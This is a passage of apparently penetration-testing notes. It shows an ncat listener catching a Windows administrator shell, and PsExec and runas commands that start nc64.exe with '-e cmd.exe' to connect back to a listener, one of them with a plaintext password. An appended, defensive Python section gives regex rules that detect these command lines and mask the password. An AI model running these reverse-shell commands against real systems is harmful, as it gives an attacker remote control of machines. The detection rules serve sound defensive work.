# ncat -nlvp 7777
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 8DA3 D4BA 9D5C 4D30 453A 2748 3DFA 8038 C47C C013
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 172.16.201.164.
Ncat: Connection from 172.16.201.164:50057.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Win10\Desktop>whoami
whoami
desktop-bmrp4pl\administrator
3. PsExec (local only)
>PsExec64.exe -accepteula -d \\%COMPUTERNAME% -u WORKGROUP\Administrator -p admin "nc64.exe" -nd 172.16.201.195 7777 -e cmd.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
nc64.exe started with process ID 1564.
4. Runas
C:\Users\Win10\Desktop>runas /noprofile /user:WORKGROUP\Administrator "nc64.exe -nd 172.16.201.195 7777 -e cmd.exe"
Enter the password for WORKGROUP\Administrator:
Attempting to start nc64.exe -nd 172.16.201.195 7777 -e cmd.exe as user "WORKGROUP\Administrator" ...
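
Added example, not part of the original notes: both invocations above leave distinctive process-creation command lines, and PsExec's `-p` puts the password itself into that record. The Python below flags those patterns and masks the password before the line is stored. It assumes command-line process auditing is enabled (e.g. Security event 4688 with command line, or Sysmon event ID 1); the rule names, the host `FILESRV01` and the sample lines are constructed for illustration.

```python
import re

# Constructed process-creation command lines modelled on the commands on this
# page (not real telemetry). FILESRV01 and the notepad line are made up.
SAMPLE_CMDLINES = [
    r'PsExec64.exe -accepteula -d \\DESKTOP-BMRP4PL -u WORKGROUP\Administrator '
    r'-p admin "nc64.exe" -nd 172.16.201.195 7777 -e cmd.exe',
    r'runas /noprofile /user:WORKGROUP\Administrator '
    r'"nc64.exe -nd 172.16.201.195 7777 -e cmd.exe"',
    r'nc64.exe -nd 172.16.201.195 7777 -e cmd.exe',
    r'PsExec64.exe -accepteula \\FILESRV01 ipconfig /all',
    r'notepad.exe C:\Users\Win10\Desktop\notes.txt',
]

# Hypothetical rule names; each regex targets one trait of the page's commands.
RULES = {
    # PsExec given an explicit account and a password on the command line
    "psexec_explicit_creds": re.compile(
        r'(?i)\bpsexec(64)?(\.exe)?\b.*\s-u\s+\S+.*\s-p\s+\S+'),
    # runas starting a program under a different account
    "runas_alternate_user": re.compile(r'(?i)\brunas(\.exe)?\b.*\s/user:\S+'),
    # a command interpreter handed to a network tool via -e
    "shell_bound_to_socket": re.compile(
        r'(?i)\s-e\s+"?(cmd|powershell)(\.exe)?\b'),
}
PASSWORD_ARG = re.compile(r'(?i)(\s-p\s+)\S+')


def analyze(cmdline):
    """Return matched rule names and a copy of the line safe to store."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(cmdline))
    if "psexec_explicit_creds" in hits:
        # Only the first -p is PsExec's; later ones belong to the child command.
        cmdline = PASSWORD_ARG.sub(r"\1<redacted>", cmdline, count=1)
    return {"hits": hits, "cmdline": cmdline}


def triage(cmdlines):
    """Keep only the records that matched at least one rule."""
    return [r for r in map(analyze, cmdlines) if r["hits"]]


if __name__ == "__main__":
    for record in triage(SAMPLE_CMDLINES):
        print(", ".join(record["hits"]), "|", record["cmdline"])
```

Note that `runas` prompts for the password, so only the PsExec form exposes it in the log; the plain PsExec administration line and the notepad line produce no hits.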